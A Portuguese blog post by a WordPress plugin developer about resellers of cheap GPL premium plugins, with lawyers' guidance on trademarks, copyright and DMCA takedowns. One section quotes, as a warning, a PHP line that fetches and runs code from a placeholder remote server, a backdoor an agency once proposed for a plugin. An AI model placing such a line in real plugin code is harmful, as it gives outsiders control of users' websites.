O melhor guia para proteger legalmente seu negócio de plugins GPL WordPress contra trolls

O licenciamento de software pode ser um assunto muito confuso, especialmente no mundo de código aberto. Os limites da legalidade e da ética nem sempre são claros. Mas como os proprietários de empresas se concentram na venda de plugins GPL do WordPress, é nosso dever entender esses tópicos completamente.

Este post não abordará a ética e se concentrará nas considerações legais. Ele fornecerá uma fórmula acionável passo a passo, incluindo feedback de advogados experientes neste espaço, para proteger seu negócio WordPress contra 'trolls' de plugins.

Como desenvolvedor de plugins nos últimos cinco anos, li vários artigos discutindo a GPL, suas liberdades e os desafios associados à administração de um negócio compatível com a GPL. Mas nos últimos meses, esse tópico se tornou ainda mais significativo para mim.

Em agosto, uma conta do Twitter chamada WordPress Plugins (https://twitter.com/plugswp) me seguiu. Por uma questão de hábito, verifiquei o perfil deles para saber mais sobre esse usuário. Logo descobri que o manipulador estava associado a 'wppluginscheap.com', um 'troll' de plugins e temas que se apresenta como "a fonte número 1 de plugins e temas baratos premium do WordPress". Navegando no site, encontrei muitos plugins premium populares como Yoast SEO, Backup Buddy, WP Robot e 50 temas premium. Cada produto vendido por menos de US $ 10.

Ingênuo como eu era, entrei no WPChat e comecei um novo tópico:

Estamos todos codificando sob a ameaça de que alguns trolls apareçam e revendem nossos plugins / temas GPL por preços ridículos. Bem… está aqui Que tal comprar o Yoast Premium SEO por $4,00… Estou um pouco chateado e por outro lado divertido, pois sabia que um dia iria aparecer.

Fiz duas perguntas à comunidade:
1. Como podemos desmontá-lo?
2. Você se sente ameaçado?

Paralelamente, fui ao grupo Advanced WordPress no Facebook, e fiz o upload do seguinte status:

Joost de Valk e Thomas Hofter, a menos que vocês comecem a vender seus plugins por menos de $10, acho que esses caras violam suas marcas registradas (e dezenas de outros desenvolvedores de plugins). Como baixamos?

Se você é um membro do grupo AWP, você pode conferir todo o tópico aqui.

Ambos os tópicos geraram muito interesse e discussão. Recebi 17 respostas no WPChat e 84 comentários no grupo AWP no Facebook. Quando as respostas começaram a se acumular, percebi duas coisas:
1. O plugin WordPress / trolls temáticos são uma epidemia – está acontecendo em todos os lugares!

Isso vem acontecendo há muito tempo, embora principalmente com temas e complementos do WooCommerce. Veja gplclub.org e sozot.com. O WPAvengers.com fez algo semelhante antes de encerrar.

– Leland Fiegel, fundador do WPChat

2. Embora existam centenas de postagens de blog sobre todos os aspectos da licença GPL, ainda há muita confusão no ecossistema. Mesmo entre os influenciadores. Parece que muitas pessoas acham que é tecnicamente correto (embora antiético) fazer isso, já que plugins e temas são licenciados sob a GPL.

Esses oportunistas aparecem de vez em quando e nunca parecem valer nada. É legal (a parte GPL, de qualquer maneira), mas antiético. É preguiçoso. E é ruim para os clientes porque as mercadorias estão em forma questionável, desatualizadas, sem suporte e suspeitas.

– Steven Gliebe, Desenvolvedor de Temas e Fundador do Pro Plugin Directory

É antiético, no entanto, se eu, como proprietário de uma loja de temas / plugins, lançando sob a GPL, eu diria isso, sinto que sou ainda mais antiético se puder dizer isso do que esses caras, e um total hipócrita.

– Ionut Neagu, fundador da CodeinWP

Outros comentários recebidos no Facebook incluem:

• Se os plugins foram licenciados sob GPL, temo que eles não possam fazer nada
• Eu não acho que as versões premium estejam sob GPL
• É legal, sob a GPL

E há muito mais desses!

Então, antes de começarmos, deixe-me esclarecer uma coisa...

Isso está completamente errado!

Os desenvolvedores ainda têm direitos aplicáveis, mesmo que seus plugins sejam distribuídos sob uma licença de código aberto.
Esses 'Plugin Trolls' ainda podem ser responsabilizados por violação de marca registrada e/ou violação de direitos autorais.

Quero acrescentar que li muitas opiniões dizendo que nenhum mal é feito para o negócio por esses trolls. Se fosse esse o caso, eu não me incomodaria em gastar tanto tempo compilando este post. Gostaria de aproveitar a oportunidade para explicar as razões pelas quais os trolls são ruins para a comunidade WordPress – para o seu negócio e também para os usuários do WordPress.

Por que os trolls de plugins são ruins para o seu negócio de plugins?

Receitas perdidas

Quer você goste ou não, uma parte dos usuários comprará ou obterá seu plug-in premium nesses sites. Especialmente os novatos do WordPress. Se eu era novo no ecossistema WordPress e procurava um plugin de SEO, o Yoast SEO por US $ 4 parece muito mais atraente do que o preço total. Eu simplesmente compraria. Assim como sempre procuro o melhor desconto quando estou comprando um smartphone ou outros produtos. Não preciso da “garantia original” pois nunca a usei com nenhum dos produtos que comprei, então o suporte não é algo que os usuários tenham em mente desde o início.

Abuso de suporte

Se houver algum problema com o plugin comprado do troll – adivinhe quem é o culpado por isso? Claro que o verdadeiro desenvolvedor/empresa. Se a arte associada à sua marca for replicada, os clientes entrarão em contato com você. Assim como se eu comprei um smartphone HTC na Amazon, quando tenho problemas com o dispositivo, ligo para o suporte técnico da HTC, não para a Amazon. O que você diria ao usuário? “Sim, é o nosso telefone, mas você precisa entrar em contato com a Amazon para obter suporte técnico.” Essa resposta seria difícil para um usuário digerir. Parece que você não está por trás de seus produtos.

Se houver algum problema com o plugin comprado do troll – adivinhe quem é o culpado por isso?Tweet

Danos à marca

Não há dúvida de que alguns trolls injetam código malicioso nos plugins. O principal incentivo para fazer isso é gerar receita ao distribuir os plugins premium gratuitamente. Eu mesmo testemunhei isso. Dois anos atrás, fui abordado por um cara sênior de SEO de uma agência do BIG UK (mais de 100 funcionários). . Ele se ofereceu para fazer parceria comigo adicionando uma simples linha de código ao nosso plugin:
eval(wp_remote_get( 'http://www.company.com/path/to/api/endpoint/' )['body']);

A ideia era que o endpoint da API retornasse URLs ocultos para empurrar os backlinks de suas empresas de portfólio. Um dos exemplos que ele enviou foi:

<a href="”http://www.portfolio-company.com”">Great Company</a>

Os trolls podem injetar código malicioso em plugins enquanto usam sua marca original, um dano direto à sua marca!Tweet

Isso foi antes do Google Penguin e foi um ótimo hack de SEO. E a oferta também foi fantástica – $ 0,1 por domínio por mês. Então, se eu tivesse 100.000 domínios ativos usando meu plugin, eu poderia gerar $ 10.000/mês. receitas sem gastar um minuto extra. Incrível né? Obviamente não o fizemos, por várias razões, principalmente porque este código era EXTREMAMENTE malicioso. Ele abre um backdoor remoto para fazer o que quiser com o site. Mesmo que a agência tenha a intenção de usá-lo apenas para SEO, o que acontece se o servidor for hackeado e alguém com más intenções assumir o controle? Quem sabe quantos plugins legítimos do WordPress.org fizeram parceria com essa agência... Voltando aos trolls, suas intenções são puramente financeiras. Eles não promovem seus plugins premium por diversão, eles querem ganhar dinheiro. E se eles fazem coisas ilegais como violação de direitos autorais e marcas registradas, nada os impede de gerar fluxos de receita alternativos como injeções de código. Ah, e esqueci de mencionar que, se algo assim acontecer, você é o culpado! É o seu produto e a sua marca.

Por que os trolls de plugins são ruins para os usuários?

Por muitas das mesmas razões que mencionei, mas da perspectiva do usuário.

Sem suporte

Ao enfrentar um problema técnico, o troll simplesmente não pode ajudá-lo. Não é o produto deles, eles não têm idéia sobre o código ou como resolver quaisquer problemas relacionados. Além disso, eles não têm os recursos de suporte para fazê-lo. E se você tentar entrar em contato com a empresa original, os desenvolvedores de plugins premium têm a infraestrutura para acompanhar seus clientes. A empresa geralmente não o ajudará até que você compre uma licença original.

Redistribuidores ilegais de plugins não podem e não irão ajudá-lo com problemas técnicos.Tweet

Sem atualizações automatizadas

A maioria dos plugins premium no mercado hoje tem um mecanismo de licenciamento e atualizações (os trolls costumam 'hackear' essa parte antes de redistribuir o plugin). A maneira como esse mecanismo de atualizações automáticas funciona é que uma vez a cada 24 horas, o plug-in verifica o servidor da empresa original para ver se há atualizações para a versão premium. Também autentica com uma chave de licença. Como o plug-in do troll nunca foi emitido com uma chave de licença da empresa original, esse mecanismo de atualização NÃO funcionará. Portanto, toda vez que um plugin premium não original é instalado, não há atualizações automáticas. Isso é ruim, pois os hackers estão constantemente encontrando novas vulnerabilidades criativas e um plug-in premium desatualizado pode ser esse vazamento de segurança.

Plugins piratas do WordPress não possuem mecanismo de atualizações automatizadas – vulnerabilidade de segurança constante!Tweet

Principais vazamentos de segurança

Lembre-se da linha maliciosa de código que mencionei acima? Você gostaria de ter um backdoor para o seu site aberto para hackers? Esse backdoor literalmente permite que um hacker modifique cada pixel e conteúdo do seu site. E isso é apenas um exemplo, tenho certeza que existem muitas outras injeções criativas por aí.

O que cobrem as licenças de código aberto?

Como há claramente muita confusão sobre esses problemas na comunidade de desenvolvedores, entrei em contato com meu amigo Ariel Reinitz e seu colega Matthew Hintz, advogados de Propriedade Intelectual (PI) (patentes, marcas registradas e direitos autorais) da Lowenstein Sandler LLP, uma empresa nacional com escritórios de Nova York a Palo Alto.

Ariel me explicou que, embora os 'trolls' do plugin WP possam tecnicamente ter o direito de redistribuir o código que está sob uma licença de código aberto (por exemplo, GPL), existem outros direitos de propriedade intelectual ('IP') que não são cobertos pelo código aberto licença que esses 'trolls' ainda podem estar infringindo.

Aqui está o que Ariel tem a dizer sobre a GPL:

É importante entender o que a licença de código aberto (GPLv2) sob a qual a maioria dos plugins do WordPress é distribuída cobre (e não):

Uma licença de código aberto determina como o software/código-fonte deve ser distribuído. Geralmente, essas licenças permitem que qualquer pessoa use, modifique, etc., o software/código sem nenhum custo. Assim, o código-fonte de um projeto de código aberto pode ser redistribuído por outras partes sem violar os termos da GPL.

Em palavras simples – a liberdade GPL permite que qualquer pessoa pegue o código-fonte e faça o que quiser com ele, incluindo distribuição. Acredito que há um consenso nessa parte na comunidade.

O que as licenças de código aberto não cobrem?

No entanto, as licenças de código aberto (incluindo a GPLv2) geralmente não se estendem a marcas registradas. As marcas registradas referem-se à maneira pela qual um produto (por exemplo, um plug-in, tema, aplicativo etc.) /ou seu logotipo. Assim, embora o código-fonte de um projeto possa ser redistribuído livremente sob uma licença de código aberto, tal licença não concede a terceiros quaisquer direitos sobre as marcas associadas ao projeto (por exemplo, o nome do produto, a empresa que o desenvolveu, etc.).

Em palavras que não sejam de advogados – a GPL não permite o uso de nenhuma marca registrada do plug-in, como o nome do produto, o nome da empresa e o logotipo. Ariel nos dá um exemplo:

Assim, por exemplo, se um terceiro redistribui um plugin do WordPress usando toda a marca original do projeto (por exemplo, promovendo-o com o nome original, logotipo, etc., da empresa/projeto), isso provavelmente infringiria a marca registrada do desenvolvedor original direitos. Conforme observado, a licença de código aberto não permite que alguém use a marca de outra pessoa em um contexto comercial. Isso é importante porque um dos principais princípios da lei de marcas registradas é proteger o consumidor da confusão sobre a origem de um produto.

Os principais princípios da lei de marcas registradas não são apenas proteger o negócio, mas proteger o consumidor da confusão sobre a origem de um produto. Essa é uma nota importante!

Também é importante reconhecer que muitas empresas de código aberto registram, protegem e policiam seus direitos de marca registrada. Os exemplos incluem: Linux , MySQL , Red Hat e WordPress .

O que Ariel está dizendo aqui é que muitos dos maiores nomes do código aberto protegem e policiam seus direitos de marca registrada. Por que não devemos fazer o mesmo?

Se a Red Hat pode proteger e policiar seus direitos de marca registrada, por que os desenvolvedores de plugins não podem?Tweet

Além dos direitos de marca registrada, Ariel destacou que os desenvolvedores também têm direito à proteção de direitos autorais em materiais que produzem que não fazem parte do código-fonte:

Também é importante reconhecer que a GPL (e outras licenças de código aberto) cobrem apenas o código-fonte do próprio plugin. Mas, se o desenvolvedor cria materiais que não fazem parte do código-fonte (por exemplo, gráficos, materiais promocionais, embalagens, etc.), esses materiais não se enquadram na GPL e o desenvolvedor não tem obrigação de permitir que outra parte redistribuir os materiais.

Por exemplo, dê uma olhada em como o plug-in 'Yoast' é apresentado em alguns dos sites 'troll' mencionados acima. Embora esses sites possam tecnicamente redistribuir o código-fonte do Yoast (como está sob a GPL), esses sites também incorporam elementos como a marca do Yoast (por exemplo, o nome e o logotipo do Yoast, que são marcas registradas ), bem como outros materiais criativos desenvolvidos por Yoast (por exemplo, o gráfico do cara bebendo chá que não faz parte do código-fonte do Yoast e, portanto, os direitos autorais são de propriedade do Yoast e não estão sujeitos à GPL).

Então – enquanto o troll pode ter o direito legal de redistribuir o código-fonte do Yoast, a GPL (ou outra licença de código aberto) não dá a eles o direito de usar (a) a marca do Yoast (marcas registradas) ou (b) outros gráficos, materiais, etc. ., (direitos autorais) . Como não fazem parte do código-fonte do plug-in, esses itens não se enquadram na GPL e, portanto, os direitos de propriedade intelectual (IP) desses itens são de propriedade exclusiva do desenvolvedor .

Como os 'trolls' do plugin estão usando as marcas registradas do desenvolvedor e materiais protegidos por direitos autorais (como nos exemplos do 'Yoast' acima), existem procedimentos legais (como exploraremos em detalhes abaixo) que os desenvolvedores podem usar para fazer valer esses direitos para pare, dissuada ou pelo menos tente limitar o impacto que esses 'trolls' podem ter em seu negócio. Novamente, isso é verdade mesmo que seu plugin seja distribuído sob a GPL.

O que é protegido por marcas?

Matthew explica o que as marcas registradas cobrem:

Simplificando, uma marca registrada é um identificador exclusivo para os consumidores que distingue a fonte de bens ou serviços de outras. Na maioria das vezes, uma marca registrada é uma palavra, logotipo ou alguma combinação desses elementos. Nos Estados Unidos, os direitos de marca registrada começam com o uso no comércio (chamado de “direitos de direito comum”), não por meio do registro no United States Patent & Trademark Office (USPTO). No entanto, o registro de sua marca no USPTO oferece ao proprietário muitos benefícios não disponíveis por meio de direitos comuns. Notavelmente, isso inclui evidência do direito exclusivo do registrante de usar uma marca nos Estados Unidos em conexão com os bens ou serviços estabelecidos no registro, aviso construtivo de que o registrante é o proprietário da marca registrada, listagem do registro no USPTO banco de dados online e capacidade de usar o símbolo. (Antes do registro, um símbolo TM pode ser usado com uma marca registrada.)

O código é protegido por uma marca registrada?

Durante minha pesquisa, li alguns posts mencionando que ao bifurcar um plugin licenciado GPL ou um tema, o código deve ser refatorado para garantir que não haja funções que incluam o identificador de marca registrada como parte do nome da função. Para esclarecer isso, perguntei a Matthew se o código também é protegido pela marca registrada, e aqui está a resposta:

O próprio código não é protegido por marca registrada. As marcas registradas protegem a palavra ou o logotipo que um consumidor associa aos seus produtos ou serviços. Um limite para a proteção de marca registrada para um plug-in seria a palavra ou logotipo usado para comercializar o plug-in para os consumidores. E então o teste fundamental para violação de marca registrada é se os consumidores provavelmente ficariam confusos com a semelhança das duas marcas. A similaridade é avaliada observando coisas como semelhança visual e fonética, quão intimamente relacionados são os produtos/serviços para cada marca, quão distintivas são as marcas e há quanto tempo as marcas são usadas.

Para esclarecer a resposta em uma linguagem amigável ao desenvolvedor:

• Nomes de classes, nomes de funções, nomes de variáveis ​​e nomes de constantes NÃO são protegidos por marca registrada.
• Por outro lado, as strings que são impressas na página e visíveis para os usuários finais – são protegidas por marca registrada.

Como registrar um registro de marca?

Para obter os benefícios do registro federal de uma marca, sua marca deve ser registrada no USPTO. Um pedido de registro deve incluir informações básicas: nome do requerente/proprietário, a marca, os produtos ou serviços com os quais a marca é usada, evidência de uso da marca com esses produtos ou serviços e datas do primeiro uso dessa marca . Considerações para sua aplicação:

• Pesquise no banco de dados TESS do USPTO (http://www.uspto.gov/trademark) por marcas iguais ou semelhantes. Se marcas iguais ou semelhantes forem solicitadas ou já registradas, elas podem ser a base para a rejeição do seu pedido. Pesquise também via Google ou outros serviços de pesquisa, pois uma marca pode ser usada sem registro e ter direitos superiores sobre essa marca, apesar do seu registro. O registro não esgota os direitos de marca registrada de um usuário anterior.
• Para descrever seus bens ou serviços, pesquise no Manual de ID do USPTO o idioma aceitável: http://tess2.uspto.gov/netahtml/tidm.html . Você também pode pesquisar o idioma aceitável no TESS.
• As classes são indicações gerais relativas a determinados campos de bens ou serviços. Por exemplo, os plug-ins para download geralmente estão na Classe 9, que abrange todos os programas e softwares de computador.
• As taxas para um pedido de marca registrada são determinadas pelo número de classes. A taxa geral é de $ 275 por aula, mas opções de arquivamento menores e mais caras estão disponíveis.

Após o depósito de um pedido, o USPTO examinará o pedido para determinar se a marca é um identificador exclusivo (ou seja, não descritivo ou semelhante a pedidos ou registros apresentados anteriormente). O USPTO fornece cronogramas para aplicativos: http://www.uspto.gov/trademark/trademark-timelines/trademark-application-and-post-registration-process-timelines .

Lembre-se de que a proteção da marca registrada é territorial. Por exemplo, um registro nos Estados Unidos fornecerá proteção de marca registrada nos Estados Unidos.

Como Matthew descreveu, o processo não é necessariamente complexo – mas leva tempo e esforço. Eu recomendaria pagar um advogado de nível médio para fazer isso por você. Deve custar entre US $ 200 e US $ 2.000 pelo trabalho, embora economize tempo e garanta uma aplicação melhor. De qualquer forma, antes de começar, pesquise no Google! Se você encontrar um produto ou uma empresa (particularmente no mesmo campo ou similar) que corresponda exatamente ao seu termo / frase, há uma boa chance de você NÃO conseguir registrar a marca (e pode estar violando a marca de outra pessoa).

O que fazer quando sua marca é violada?

Vou começar com o que você NÃO deve fazer – se for uma violação de marca registrada, não de direitos autorais, você NÃO deve registrar uma remoção de DMCA.

DMCA cobre SOMENTE violação de direitos autorais. Nenhuma disposição semelhante está disponível para marcas registradas. O uso de avisos de remoção da DMCA para reivindicações de marcas registradas pode resultar na responsabilidade do reclamante por declarações falsas.

Geralmente, é mais simples tentar resolver os problemas diretamente com o proprietário do site. Se isso não for bem-sucedido, você poderá iniciar uma ação legal contra o proprietário do site, o host etc. A abordagem específica que você adotar provavelmente será específica para cada caso e, neste momento, sugiro entrar em contato com um advogado para entender a melhor opção em suas circunstâncias específicas .

O que é protegido por direitos autorais?

Copyright é diferente de marca registrada. Os direitos autorais protegem obras originais de autoria fixadas em algum meio de expressão. No entanto, um limite para a proteção de direitos autorais é que ela se estende apenas à expressão, não à ideia. As categorias de obras para proteção de direitos autorais incluem obras literárias (livros, código), obras musicais, fotografias e imagens, filmes, gravações sonoras, entre outras categorias. Outro limite é que os direitos autorais não protegem frases ou expressões curtas – isso permanece para proteção de marcas, desde que funcionem como identificadores únicos para os consumidores que distinguem a origem dos bens ou serviços de outras.

O que fazer quando seus direitos autorais são violados?

1. Inicialmente, geralmente é mais simples tentar entrar em contato diretamente com o proprietário do site. Em muitos casos, o proprietário do site não está mais interessado do que você em contratar advogados, envolver-se em processos judiciais, etc. Tente encontrar a conta do Twitter, e-mail de contato ou página de contato no site e envie uma mensagem exigindo a remoção do seu plug-in de marca registrada do site.
2. Se isso não ajudar, você pode enviar um aviso de remoção DMCA (Digital Millennium Copyright Act). Existem vários geradores para ajudá-lo a criar um, basta pesquisar no Google por “gerador de remoção de dmca”. Depois de receber o aviso, você precisará enviá-lo ao proprietário do site, à empresa de hospedagem e ao ISP. Você também pode enviar um aviso aos mecanismos de pesquisa para remover o site dos resultados da pesquisa. Para encontrar a empresa de hospedagem, você pode usar sites como whoishostingthis.com. Para encontrar o ISP você pode usar sites como http://www.whoismyisp.org/. Para encontrar o link relevante para arquivar o DMCA no ISP / Hosting, pesquise no google por ISP_NAME / HOSTING_NAME + DMCA.

Como alternativa, você pode iniciar uma ação legal contra o proprietário do site, host, etc. Sugiro entrar em contato com um advogado para entender se essa é ou não a melhor opção em suas circunstâncias específicas.

Conclusão

Espero que este conjunto de instruções passo a passo o capacite com as ferramentas certas para proteger seu negócio de plugins GPL contra trolls. Apenas uma recapitulação:

• Como proprietário de uma empresa, você é elegível e deve proteger a marca e os ativos de sua empresa.
• Marcas registradas e direitos autorais são formas relativamente baratas e eficazes de proteger legalmente seu negócio de plugins. Portanto, você deve considerar fortemente o registro de marcas comerciais para o nome da sua empresa e nomes de produtos.
• Muitos trolls infringem direitos autorais (por exemplo, ao retirar seus gráficos promocionais) e marcas registradas (usando o nome da sua marca). Ao criar um nome de marca, logotipo e arte exclusivos, você gera um portfólio para ajudar a combater a violação de direitos autorais.

Muitos trolls infringem direitos autorais e marcas registradas. Ao criar um nome de marca, logotipo e arte exclusivos, você gera um portfólio para ajudar a combater a violação de direitos autorais.Tweet

Se um site de terceiros listar seu plugin ou tema GPL premium, para venda ou oferta, sem o seu consentimento:

• Se o site estiver usando sua arte original ou outros materiais, isso provavelmente é uma violação de direitos autorais. Você pode registrar uma remoção de DMCA.
• Se o site estiver usando a marca registrada de sua empresa ou produto, é provável que seja uma violação de marca registrada. Você pode iniciar um processo legal contra o site.

Se você tiver alguma opinião adicional sobre as implicações legais e éticas da GPL, sinta-se à vontade para compartilhá-la nos comentários abaixo.

Ótimas referências:

• Aviso de remoção do DMCA emitido contra o fork do WP Migrate DB Pro
• A licença GPL não oferece liberdade para infringir marcas registradas
• A GPL do WordPress está sendo abusada?
• Por que estamos pagando pelo código licenciado GPL?